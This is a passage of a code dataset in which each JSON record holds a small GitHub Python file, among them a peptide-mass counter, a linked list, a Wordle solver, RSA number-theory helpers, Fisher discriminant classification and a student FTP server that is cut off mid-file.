[57,71,87,97,99,101,103,113,113,114,115,128,128,129,131,137,147,156,163,186]\r\n massTable = dict(zip(weights, aa))\r\n return massTable\r\n\r\ndef findComb(pepMass):\r\n table = {}\r\n for i in range(pepMass+1):\r\n table[i] = 0\r\n aaTable = createAaTable()\r\n for w in aaTable:\r\n table[w] += 1\r\n for m in range(pepMass+1):\r\n #m is the current mass number\r\n for weight in aaTable:\r\n diff = m-weight\r\n #aa = aaTable[weight]\r\n if diff in table:\r\n table[m]+=table[diff]\r\n print(table[pepMass])\r\n return table[pepMass]\r\n\r\n \r\n \r\n\r\ndef main():\r\n start = time.time()\r\n# inNum = sys.argv[1]\r\n# inNum = int(inNum)\r\n pepMass = 1426\r\n numComb = findComb(pepMass)\r\n end = time.time()\r\n print(\"runtime:\", str(end-start), \"seconds\")\r\n \r\nmain()","repo_name":"dlewis27/rosalind","sub_path":"ComputeTheNumberOfPeptidesOfGivenTotalMass.py","file_name":"ComputeTheNumberOfPeptidesOfGivenTotalMass.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5385653221","text":"from typing import Optional\n\nclass Node:\n def __init__(self, value: int):\n self.value = value\n self.next: Optional[Node] = None\n\nclass LinkedList:\n def __init__(self, node: Node = None):\n self.head = node\n\n def append_head(self, node: Node):\n current = self.head\n self.head = node\n self.head.next = current\n \n def append_tail(self, node: Node):\n if self.head is None:\n self.head = node\n return\n \n current = self.head\n while current.next:\n current = current.next\n current.next = node\n\n def get_position(self, position: int) -> Optional[Node]:\n if position < 1:\n return None\n \n current = self.head\n while current:\n position -= 1\n if position == 0:\n return current\n current = current.next\n \n return None\n\n def insert(self, node: Node, position: int):\n if position < 1:\n return\n \n current = self.head\n if position == 1:\n self.head = node\n self.head.next = current\n return\n \n while current:\n position -= 1\n if position == 1:\n old_next = current.next\n current.next = node\n node.next = old_next\n return\n current = current.next\n \n def delete(self, value: int):\n if value == self.head.value:\n self.head = self.head.next\n return\n\n current = self.head\n while current:\n previous = current\n current = current.next\n if current.value == value:\n previous.next = current.next\n return\n","repo_name":"vladimirdotk/alg","sub_path":"python/alg/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37659382831","text":"import random\n\nsentence = \" Reeves, whose name means over the in Hawaiian, for a living.\"\nsentence2 = \" in the and then the later.\"\nsentence3 = \" eats a before he goes to . It was there, where he encountered his enemy , and then for the entire day.\"\n\nd= {}\nd[\"First_Name\"] = [\"Keanu\", \"Charles\", \"Agatha\", \"Leslie\"]\nd[\"Adjective\"] = [\"dead\", \"metal\", \"massive\", \"blue\"]\nd[\"Noun\"] = [\"tank\", \"sky\", \"kitty\", \"jaguar\", \"mountain\", \"karate\", \"weeds\", \"wolf\"]\nd[\"Verb\"] = [\"meditates\", \"acts\", \"jumps\", \"explodes\", \"ate\", \"ran\"]\nd[\"Hero\"] = [\"Superman\", \"Wonder-Woman\", \"Batman\", \"Thor\", \"Spiderman\"]\n\ndef madlibs(s, dict):\n new_sentence = []\n hero_name = random.choice(d[\"Hero\"])\n for item in s.split():\n if item == \"\":\n new_sentence.append(random.choice(dict[\"First_Name\"]))\n elif item == \"\":\n new_sentence.append(random.choice(dict[\"Adjective\"]))\n elif item == \"\":\n new_sentence.append(random.choice(dict[\"Noun\"]))\n elif item == \"\":\n new_sentence.append(random.choice(dict[\"Verb\"]))\n elif item == \"\":\n new_sentence.append(hero_name)\n else:\n new_sentence.append(item)\n return \" \".join(new_sentence)\n\nprint(madlibs(sentence, d))\nprint(madlibs(sentence2, d))\nprint(madlibs(sentence3, d))","repo_name":"Kushendra1/csci127-assignments","sub_path":"hw_07/madlib.py","file_name":"madlib.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"147502359","text":"lopA1 = [7.8, 5.6, 8.7, 8.9, 9, 9.5]\nlopA2 = [6.0, 6.5, 9.3, 9.2, 7.5]\n\nchoice = input(\"Hãy lựa chọn yêu cầu:\\n1. Bấm phím 1 nếu muốn sắp xếp bảng điểm theo thứ tự tăng dần.\\n2. Bấm phím 2 nếu muốn sắp xếp bảng điểm theo thứ tự giảm dẫn.\\n\")\n\nif choice == \"1\":\n diem = lopA1 + lopA2\n diem.sort()\n print(diem)\n\nif choice == \"2\":\n diem = lopA1 + lopA2\n diem.sort(reserve=True)\n print(diem)\n","repo_name":"TienLe0305/Internship-19-10-2023","sub_path":"Python/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17721159382","text":"'''def name(name, age):\n print(\"Hello\")\n print(f\"Hai {name} . Your age is {age}\")\n\n\nprint(\"Start\")\nname(\"Syam\", 30)\nname(age=27, name=\"sarath\")\nprint('Stop')'''\n\n# Return statement\n\n\n'''def square(number):\n print(number * number)\n\nsquare(3)'''\n\n\n'''def emogi_converter(message):\n words = message.split(' ')\n emojis = {\n \":)\": \"😊\",\n \":(\": \"😒\"\n }\n output = \" \"\n for word in words:\n output = output + emojis.get(word, word) + \" \"\n return output\n\n\nmessage = input(\">\")\n\nprint(emogi_converter(message))'''\n\n# Exception\ntry:\n age = int(input(\"Age : \"))\n income = 20000\n risk = income / age\n print(age)\nexcept ZeroDivisionError:\n print(\"Age cannot be zero\")\nexcept ValueError:\n print(\"Invalid value\")\n\n\n\n\n\n","repo_name":"Sarathbabu0108/Learn_Python_Tutorial2","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33141562860","text":"import urllib.request, urllib.parse, urllib.error\nimport re\nfhand= urllib.request.urlopen('http://py4e-data.dr-chuck.net/comments_42.html')\nx=list()\n\ndic= dict()\n\nfor line in fhand:\n line= line.decode()\n print(line)\n y= line.split('0-9')\n w= re.findall('[0-9+]', y)\n print(w)\n #type(y)\n","repo_name":"uwaiseibna/pythonall","sub_path":"url1.py","file_name":"url1.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35834669814","text":"import random\r\nimport time\r\n\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef create_points(each_train_num, each_test_num):\r\n '''\r\n 生成训练和测试用的正态分布点\r\n :return:\r\n '''\r\n\r\n a_train = []\r\n b_train = []\r\n a_test = []\r\n b_test = []\r\n\r\n for i in range(0, each_train_num):\r\n # a组训练样本初始化\r\n a_train.append({})\r\n a_train[i]['x1'] = np.random.normal(loc = -5.0, scale = 1.0)\r\n a_train[i]['x2'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n a_train[i]['bias'] = 1\r\n a_train[i]['y'] = 1\r\n a_train[i]['y_'] = 0\r\n\r\n # b组训练样本初始化\r\n b_train.append({})\r\n b_train[i]['x1'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n b_train[i]['x2'] = np.random.normal(loc = 5.0, scale = 1.0)\r\n b_train[i]['bias'] = 1\r\n b_train[i]['y'] = -1\r\n b_train[i]['y_'] = 0\r\n\r\n for i in range(0, each_test_num):\r\n # a组测试样本初始化\r\n a_test.append({})\r\n a_test[i]['x1'] = np.random.normal(loc = -5.0, scale = 1.0)\r\n a_test[i]['x2'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n a_test[i]['bias'] = 1\r\n a_test[i]['y'] = 1\r\n a_test[i]['y_'] = 0\r\n\r\n # b组测试样本初始化\r\n b_test.append({})\r\n b_test[i]['x1'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n b_test[i]['x2'] = np.random.normal(loc = 5.0, scale = 1.0)\r\n b_test[i]['bias'] = 1\r\n b_test[i]['y'] = -1\r\n b_test[i]['y_'] = 0\r\n\r\n return [a_train, b_train, a_test, b_test]\r\n\r\n\r\ndef get_mv(a_train, b_train):\r\n mv_a = np.array([0.0, 0.0])\r\n mv_b = np.array([0.0, 0.0])\r\n for a in a_train:\r\n mv_a += np.array([a['x1'], a['x2']])\r\n for b in b_train:\r\n mv_b += np.array([b['x1'], b['x2']])\r\n mv_a = mv_a / len(a_train)\r\n mv_b = mv_b / len(b_train)\r\n return [np.mat(mv_a).T, np.mat(mv_b).T]\r\n\r\n\r\ndef get_w_and_s(a_train, b_train, mv_a, mv_b):\r\n segma_a = np.mat([[0.0, 0.0],\r\n [0.0, 0.0]])\r\n segma_b = np.mat([[0.0, 0.0],\r\n [0.0, 0.0]])\r\n sw = np.mat([[0.0, 0.0],\r\n [0.0, 0.0]])\r\n for a in a_train:\r\n segma_a += (np.mat([a['x1'], a['x2']]).T - mv_a) * (np.mat([a['x1'], a['x2']]).T - mv_a).T\r\n for b in b_train:\r\n segma_b += (np.mat([b['x1'], b['x2']]).T - mv_b) * (np.mat([b['x1'], b['x2']]).T - mv_b).T\r\n sw = segma_a + segma_b\r\n print(segma_a)\r\n sw_inverse = sw.I\r\n w = sw_inverse * (mv_a - mv_b)\r\n s = w.T * (mv_a + mv_b)\r\n print(\"the s= \"+str(s[0,0]))\r\n return [w, s]\r\n\r\n\r\ndef test(a_test, b_test, w, s):\r\n acc = 0\r\n for a in a_test:\r\n if w.T * np.mat([a['x1'], a['x2']]).T > s:\r\n a['y_'] = 1\r\n acc += 1\r\n else:\r\n a['y_'] = -1\r\n for b in b_test:\r\n if w.T * np.mat([b['x1'], b['x2']]).T > s:\r\n a['y_'] = 1\r\n else:\r\n a['y_'] = -1\r\n acc += 1\r\n acc /= (len(a_test) + len(b_test))\r\n print('test_acc= ' + str(acc))\r\n\r\n\r\ndef get_train_acc():\r\n acc = 0\r\n for a in a_train:\r\n if w.T * np.mat([a['x1'], a['x2']]).T > s:\r\n a['y_'] = 1\r\n acc += 1\r\n else:\r\n a['y_'] = -1\r\n for b in b_train:\r\n if w.T * np.mat([b['x1'], b['x2']]).T > s:\r\n a['y_'] = 1\r\n else:\r\n a['y_'] = -1\r\n acc += 1\r\n acc /= (len(a_train) + len(b_train))\r\n print('train_acc= ' + str(acc))\r\n\r\n\r\ndef draw(w, s):\r\n for a in a_train:\r\n plt.scatter(a['x1'], a['x2'], c = 'red', s = 1, label = 'a')\r\n for b in b_train:\r\n plt.scatter(b['x1'], b['x2'], c = 'blue', s = 1, label = 'b')\r\n for a in a_test:\r\n plt.scatter(a['x1'], a['x2'], c = 'red', s = 20, label = 'a', marker = '+')\r\n for b in b_test:\r\n plt.scatter(b['x1'], b['x2'], c = 'blue', s = 20, label = 'b', marker = '+')\r\n # plt.plot([-5, 5], [-(w[0,0] * (-5) + s[0,0]) / w[1,0], -(w[0,0] * 5 + s[0,0]) / w[1,0]], c = 'green')\r\n plt.plot([-5, 5], [-(w[0, 0] * 5 + s[0, 0]) / w[1, 0], -(w[0, 0] * (-5) + s[0, 0]) / w[1, 0]],\r\n c = 'green') # 取mat中的某个元素m[i,j]\r\n plt.plot([-5, 5], [-(w[0, 0] * (-5) + s[0, 0]) / w[1, 0], -(w[0, 0] * 5 + s[0, 0]) / w[1, 0]], c = 'pink')\r\n\r\n plt.xlabel(\"x1\", fontdict = {'size': 16})\r\n plt.ylabel(\"x2\", fontdict = {'size': 16})\r\n plt.show()\r\n\r\n\r\neach_train_num = 160\r\neach_test_num = 40\r\n\r\n[a_train, b_train, a_test, b_test] = create_points(each_train_num, each_test_num) # 得到训练、测试数据\r\n[mv_a, mv_b] = get_mv(a_train, b_train) # 得到mv\r\n[w, s] = get_w_and_s(a_train, b_train, mv_a, mv_b) # 得到w和s\r\nget_train_acc()\r\ntest(a_test, b_test, w, s) # 在测试数据上测试正确率\r\ndraw(w, s) # 画图\r\n","repo_name":"Liwen-Xiao/Pattern_Recognization_and_Machine_Learning","sub_path":"Fisher/Fisher.py","file_name":"Fisher.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25587389124","text":"import random\nimport time\n\n# Reduces the power by taking modulo every iteration. Log(exp) runtime.\ndef power_mod(num, exp, mod) : \n ans = 1\n num = num % mod \n while exp > 0: \n # Check if exp is odd. If it is mutiply num one time to ans.\n if (exp & 1) == 1: \n ans = (ans * num) % mod\n # Divide exp by 2\n exp = exp >> 1 \n num = (num * num) % mod \n return ans\n\n# Factors all the 2's from num\ndef div_2(num):\n count = 0\n # Check if even. If even divide by 2\n while (num & 1) == 0:\n num = num >> 1\n count = count + 1\n return {'number': num, 'count': count}\n\n# Check if number is probably prime\ndef miller_rabin_test(number, repeat): \n # Factor all 2's from number-1. (number-1) would be the order of\n # unit group mod number, if number were prime.\n div_result = div_2(number-1)\n r_power = div_result['count']\n d_number = div_result['number']\n # Will repeat the miller-rabin test with pseudorandom numbers \n # between 2 and number.\n for count in range(repeat):\n check_int = random.randrange(2, number)\n check = power_mod(check_int, d_number, number)\n mainloop = True\n if (check == 1) or (check == number-1):\n continue\n for innner_count in range(r_power):\n check = power_mod(check, 2, number)\n if check == number-1:\n mainloop = False\n break\n if mainloop:\n return False\n return True\n\n# This is an implementaion of binary gcd recursively\ndef fast_gcd(num1, num2):\n # If the numbers are the same then GCD is either number\n if num1 == num2:\n return num1\n # If either of the numbers is 0, any number divides 0,\n # so just return the other number.\n elif num1 == 0:\n return num2\n elif num2 == 0:\n return num1\n # If num1 is even and num 2 is odd gcd(num1,num2)=gcd((num1)/2,num2)\n # else if num1 is even and num 2 is also even gcd(num1,num2)=\n # 2*gcd((num1)/2,(num2)/2)\n elif (num1 & 1) == 0:\n if (num2 & 1) == 1:\n return fast_gcd(num1 >> 1, num2)\n else:\n return fast_gcd(num1 >> 1, num2 >> 1) << 1\n # If num1 is odd and num2 is even gcd(num1,num2)=gcd(num1,(num2)/2)\n elif (num2 & 1) == 0:\n return fast_gcd(num1, num2 >> 1)\n # If num1 and num2 are odd and num1 > num2 then \n # gcd(num1,num2)=gcd((num1-num2)/2, num2)\n elif num1 > num2:\n return fast_gcd((num1-num2) >> 1, num2)\n else:\n return fast_gcd((num2-num1) >> 1, num1)\n\n# Implementation of binary gcd iteratively\ndef iter_fast_gcd(num1, num2):\n shift = 0\n if num1 == 0:\n return num2\n elif num2 == 0:\n return num1\n else:\n while ((num1|num2) & 1) == 0:\n shift += 1\n num1 >>= 1\n num2 >>= 1\n while (num1 & 1) == 0:\n num1 >>= 1\n while True:\n while (num2 & 1) == 0:\n num2 >>= 1\n if num1 > num2:\n temp = num1\n num1 = num2\n num2 = temp\n num2 -= num1\n if num2 == 0:\n break\n return num1 << shift\n\ndef fast_lcm(num1, num2):\n gcd = iter_fast_gcd(num1,num2)\n return (num1*num2) // gcd\n\ndef generate_probable_prime(bits):\n # Generate a pseudoprime of 'bits' bits\n rand_int = random.getrandbits(bits)\n start_time = time.time()\n # Increment until we find prime\n while True:\n if (rand_int & 1) == 0:\n rand_int = rand_int + 1\n # Check if probable prime\n elif miller_rabin_test(rand_int, 11):\n break\n # If it takes more then 10 seconds to find a probable prime\n # run the funtion again.\n elif (time.time() - start_time) > 10:\n rand_int = generate_probable_prime(bits)\n else:\n rand_int = rand_int + 2\n return rand_int\n\n# Iterative version of extended gcd to find inverse\ndef mod_inverse(num, mod_temp) : \n\tmod = mod_temp\n\ty = 0\n\tx = 1\n\tif (mod == 1) : \n\t\treturn 0\n\twhile (num > 1) : \n\t\tq = num // mod_temp\n\t\tt = mod_temp\n\t\tmod_temp = num % mod_temp\n\t\tnum = t \n\t\tt = y \n\t\ty = x - q * y \n\t\tx = t \n\tif (x < 0) : \n\t\tx = x + mod\n\treturn x \n","repo_name":"Dweej-Patel/RSA-Encryption","sub_path":"python/number_theory.py","file_name":"number_theory.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1132747076","text":"from AvailibleWords import AvailibleWords\nfrom WordleGameEngine import WorldeGameEngine\n\nimport statistics\n\ndef get_all_words():\n all_words_file = open(\"dictionary.txt\", \"rt\")\n all_words = all_words_file.readlines()\n return [word.strip().lower() for word in all_words]\n\ndef let_us_play(all_words):\n availible_words = AvailibleWords(all_words)\n print(\"now let's start\")\n while len(availible_words) > 1:\n guess = input(\"what word was guessed\\n\").strip().lower()\n if len(guess) < 5:\n if guess == 's':\n for words in availible_words.words():\n print(word)\n continue\n if guess == 'q':\n return 'q'\n if guess == 'r':\n return 'r'\n response = input(\"what did the system respond. b for blank, y for yellow, g for green\\n\").lower().strip()\n\n availible_words.filter_guess(guess, response)\n availible_words.words()\n no_words_left = len(availible_words)\n print(\"availible words left\", no_words_left)\n if no_words_left < 11:\n for word in availible_words.words():\n print(word)\n\n\n if len(availible_words) == 0:\n print('seems like we hit an error exiting program')\n return 'q'\n print(\"the word is\", availible_words.words().pop())\n return 'r'\n\n\ndef human_against_gameEngine(all_words):\n gameEngine = WorldeGameEngine(all_words)\n word=input(\"would you like to set the word\\n\").strip()\n if word not in all_words:\n print(\"invalid word setting a random one\")\n word=None\n gameEngine.set_word_to_guess(word)\n response = ''\n while(response != 'ggggg'):\n guess = input(\"what would would you like to guess\\n\")\n response = gameEngine.guess(guess)\n print(\"response was\", response)\n\n\ndef assistant_mode(all_words):\n availible_words = AvailibleWords(all_words)\n print(\"Menu instead of guessing a word type these letters\\nclick enter for next guess\\n\\ts to show what words are availilbe\\n\\tq to quit\\n\\tr to restart with a new word\\n\")\n while (let_us_play(all_words) == 'r'):\n pass\n\n\ndef self_playing_machine(all_words):\n availible_words = AvailibleWords(all_words)\n gameEngine = WorldeGameEngine(all_words)\n gameEngine.set_word_to_guess()\n response = ''\n round = 0\n while(response != 'ggggg'):\n if round % 20 == 0 and round != 0:\n input(\"We just reached %s guesses do you want to continue?\" % (round))\n print(\"Words left in the pool\", len(availible_words))\n if len(availible_words) == 0:\n print(gameEngine.guesses_so_far, gameEngine.secret_word)\n guess = availible_words.get_next_guess()\n # print(\"guess was\", guess)\n response = gameEngine.guess(guess)\n # print(\"response was\", response)\n availible_words.filter_guess(guess, response)\n round+=1\n\n return gameEngine.guesses_so_far\n\nif __name__ == '__main__':\n all_words = get_all_words()\n\n # human_against_gameEngine(all_words)\n assistant_mode(all_words)\n # guesses_distribution = set()\n # total_games = 200\n # for count in range(total_games):\n # guesses = self_playing_machine(all_words)\n # # print(guesses)\n # guesses_distribution.add(len(guesses))\n #\n # print(statistics.mean(guesses_distribution))\n","repo_name":"zingales/WordleSolver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42105995933","text":"from __future__ import print_function, division\n\nimport os\nimport json\n\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\n\nfrom sasdash.datamodel import warehouse\n\nfrom .style import XLABEL, YLABEL, TITLE, LINE_STYLE\nfrom .style import AXIS_OPTIONS\nfrom .style import INLINE_LABEL_STYLE, GRAPH_GLOBAL_CONFIG\nfrom ..base import dash_app\n\n_DIFF_OPTIONS = [{\n 'label': 'Relative difference',\n 'value': 'relative_diff',\n}, {\n 'label': 'Absolute difference',\n 'value': 'absolute_diff',\n}, {\n 'label': 'Error',\n 'value': 'error',\n}, {\n 'label': 'Error relative difference',\n 'value': 'error_relative_diff',\n}]\n\n_CALC_FUNCTION = {\n 'relative_diff': lambda x, ref: (x.i - ref.i) / ref.i * 100.0,\n 'absolute_diff': lambda x, ref: x.i - ref.i,\n 'error': lambda x, ref: x.err,\n 'error_relative_diff': lambda x, ref: (x.err - ref.err) / ref.err * 100.0,\n}\n\n_DEFAULT_PLOT_TYPE = 'relative_diff'\n\n_DEFAULT_LAYOUT = html.Div(children=[\n dcc.Graph(\n id='difference-graph',\n figure={'data': ()},\n config=GRAPH_GLOBAL_CONFIG,\n ),\n html.Label('Select as base reference:'),\n dcc.Dropdown(\n id='difference-ref-selection',\n options={},\n value=0,\n ),\n html.Label('Plot type'),\n dcc.RadioItems(\n id='difference-plot-type',\n options=_DIFF_OPTIONS,\n value=_DEFAULT_PLOT_TYPE,\n labelStyle=INLINE_LABEL_STYLE,\n ),\n html.Label('X axis type'),\n dcc.RadioItems(\n id='difference-xaxis-scale',\n options=AXIS_OPTIONS,\n value='linear',\n labelStyle=INLINE_LABEL_STYLE,\n ),\n html.Label('Slider for xlim'),\n dcc.RangeSlider(\n id='difference-xlim',\n # count=1,\n # disabled=True,\n min=0.0,\n max=0.20,\n step=0.01,\n value=[0.0, 0.14],\n ),\n html.Label('Slider for ylim'),\n dcc.RangeSlider(\n id='difference-ylim',\n min=-150.0,\n max=150.0,\n step=1.0,\n value=[-50.0, 50.0],\n ),\n # html.Label('Parameters for smoothing'),\n # html.Label('window length'),\n # dcc.Input(\n # placeholder='Enter a positive odd integer...', value=25,\n # type='number'),\n # html.Label('Polyorder'),\n # dcc.Input(\n # placeholder='Enter an integer less than window length ...',\n # value=5,\n # type='number',\n # ),\n])\n\n\ndef get_series_analysis():\n return _DEFAULT_LAYOUT\n\n\ndef _get_figure(info, plot_type, ref_idx, xaxis_scale, xlim=None, ylim=None):\n per_dict = {key: info[key] for key in ('project', 'experiment', 'run')}\n sasm_list = warehouse.get_sasprofile(**per_dict)\n if 'diff' in plot_type.lower():\n ref_sasm = sasm_list[ref_idx]\n else:\n ref_sasm = None\n\n xaxis = dict(title=XLABEL[xaxis_scale], type=xaxis_scale)\n yaxis = dict(title=YLABEL[plot_type])\n if xlim:\n xaxis['range'] = xlim\n if ylim:\n yaxis['range'] = ylim\n\n data = [{\n 'x': each_sasm.q,\n 'y': _CALC_FUNCTION[plot_type](each_sasm, ref_sasm),\n 'type': 'line',\n 'line': LINE_STYLE,\n 'name': each_sasm.get_parameter('filename'),\n } for each_sasm in sasm_list]\n\n return {\n 'data': data,\n 'layout': {\n 'height': 500,\n 'hovermode': 'closest',\n 'title': TITLE[plot_type],\n 'xaxis': xaxis,\n 'yaxis': yaxis,\n },\n }\n\n\n@dash_app.callback(\n Output('difference-graph', 'figure'),\n [\n Input('difference-plot-type', 'value'),\n Input('difference-ref-selection', 'value'),\n Input('difference-xaxis-scale', 'value'),\n Input('difference-xlim', 'value'),\n Input('difference-ylim', 'value'),\n Input('page-info', 'children'),\n ],\n)\ndef _update_figure(plot_type, ref_idx, xaxis_scale, xlim, ylim, info_json):\n info_dict = json.loads(info_json)\n return _get_figure(info_dict, plot_type, ref_idx, xaxis_scale, xlim, ylim)\n\n\n@dash_app.callback(\n Output('difference-ref-selection', 'options'),\n [Input('page-info', 'children')])\ndef _set_ref_options(info_json):\n info = json.loads(info_json)\n project, experiment, run = info['project'], info['experiment'], info['run']\n file_list = warehouse.get_files(project, experiment, run,\n 'subtracted_files')\n return [{\n 'label': os.path.basename(each),\n 'value': i,\n } for i, each in enumerate(file_list)]\n","repo_name":"lqhuang/SAS-dashboard","sub_path":"sasdash/dashboard/layouts/series_analysis.py","file_name":"series_analysis.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27087750081","text":"class Solution:\n def uniqueLetterString(self, s: str) -> int:\n index, rslt = {c:[-1, -1] for c in string.ascii_uppercase}, 0\n for i, c in enumerate(s):\n pre, last = index[c]\n rslt += (i-last)*(last-pre)\n index[c] = [last, i]\n n = len(s)\n for c in index:\n rslt += (n-index[c][1])*(index[c][1]-index[c][0])\n return rslt%(10**9+7)\n","repo_name":"Mela2014/lc_punch","sub_path":"lc828_twopointer.py","file_name":"lc828_twopointer.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32486410737","text":"# FTP Server was implmented by Kavilan Nair (1076342) \nimport socket\nimport threading\nimport os\nimport random\nimport platform\n\n# FTP server class that inherits from the threading module\nclass FTPServer (threading.Thread):\n def __init__(self, connection_socket, address_ip):\n threading.Thread.__init__(self)\n # initialise member variables to be used later in the codde\n self.command_connection = connection_socket\n self.data_connection = None\n self.address_ip = address_ip\n self.data_connection = None\n self.type = None\n self.isConnectionTerminated = False\n self.isActiveMode = None\n self.cwd = os.getcwd()\n self.user = ' '\n\n def run(self):\n print(\"Connection from: \", str(self.address_ip))\n self.command_connection.send('220 Welcome to the FTP server\\r\\n'.encode())\n # infinite for loop to continuously preceive commands from client\n while True:\n # commands available that have been implemented and can be used by a client\n commands_available = ['USER', 'PASS', 'PASV', 'LIST', 'PWD', 'CWD', 'TYPE', 'SYST', 'RETR', 'STOR', 'NOOP',\n 'QUIT', 'PORT', 'DELE', 'MKD', 'RMD', 'CDUP']\n\n if self.isConnectionTerminated:\n break\n\n # formatting of client commands to split into command and argument\n client_message = self.command_connection.recv(1024).decode()\n print(\"From connected client \" + self.user + \": \" + client_message)\n command = client_message[:4].strip()\n argument = client_message[4:].strip()\n\n if command in commands_available:\n # call function based off string supplied through client command\n ftp_command = getattr(self, command)\n\n if argument == '':\n ftp_command()\n else:\n ftp_command(argument)\n\n elif command not in commands_available:\n self.command_connection.send(\"502 Command not implemented \\r\\n\".encode())\n\n # Function to handle USER command\n def USER(self, argument):\n if argument == \"group18\" or argument == \"group19\":\n self.user = argument\n reply = \"331 Please Specify Password\\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n else:\n reply = \"530 Login incorrect\\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n self.command_connection.close()\n\n # Function to handle password associated with username\n def PASS(self, argument):\n if (self.user == \"group18\" and argument == \"dan\") or (self.user == \"group19\" and argument == \"mat\"):\n reply = \"230 Login successful\\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n else:\n reply = \"530 Login incorrect\\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n self.command_connection.close()\n\n # Function to handle passive connection from client\n def PASV(self):\n self.isActiveMode = False\n # Randomly generate port numbers for client to connect to\n port_number1 = random.randint(47, 234)\n port_number2 = random.randint(0, 255)\n server_address = socket.gethostbyname(socket.gethostname())\n # string manipulation to format in appropriate\n server_address = server_address.split(\".\")\n server_address = ','.join(server_address)\n server_address = \"(\" + server_address + \",\" + str(port_number1) + \",\" + str(port_number2) + \")\"\n data_port = (port_number1 * 256) + port_number2\n host = socket.gethostbyname(socket.gethostname())\n try:\n # Attempt to establish data connection\n self.data_connection = self.data_establish(host, data_port)\n reply = \"227 Entering passive mode\" + str(server_address) + '\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n except socket.error:\n reply = \"425 Cannot open Data connection \\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to handle active connection to client\n def PORT(self, argument):\n self.isActiveMode = True\n # string handling\n argument = argument.split(',')\n data_host = '.'.join(argument[0:4])\n port_number = argument[-2:]\n data_port = (int(port_number[0]) * 256) + int(port_number[1])\n data_port = int(data_port)\n self.data_connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n # Attempt to establish data connection\n self.data_connection.connect((data_host, data_port))\n reply = \"225 Entering Active mode \\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n except socket.error:\n reply = \"425 Cannot open Data connection \\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to handle directory listing\n def LIST(self):\n reply = \"150 File status okay; about to open data connection.\\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n if not self.isActiveMode:\n data_sock, data_address = self.data_connection.accept()\n\n directory_list = os.listdir(self.cwd)\n for item in directory_list:\n # Uncomment to see what list contents are being sent\n # print('sending: ' + str(item))\n if not self.isActiveMode:\n data_sock.sendall((str(item) + '\\r\\n').encode())\n else:\n self.data_connection.sendall((str(item) + '\\r\\n').encode())\n\n reply = '226 Closing data connection. Requested transfer action successful\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n if not self.isActiveMode:\n data_sock.close()\n self.data_connection.close()\n\n # Function to obtain current working directory\n def PWD(self):\n reply = '257' + ' \"' + self.cwd + '\" ' + 'is the working directory\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to obtain change working directory\n def CWD(self, argument):\n path = argument\n self.cwd = self.cwd + '/' + str(path)\n if os.path.exists(self.cwd):\n reply = '250 Requested file action okay, completed.\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n else:\n reply = '550 Requested action not taken. File/Directory unavailable\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to choose ASCII or Binary mode\n def TYPE(self, argument):\n if argument == 'A':\n reply = '200 ASCII mode enabled\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n self.type = 'A'\n elif argument == 'I':\n reply = '200 binary mode enabled\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n self.type = 'I'\n else:\n reply = '501 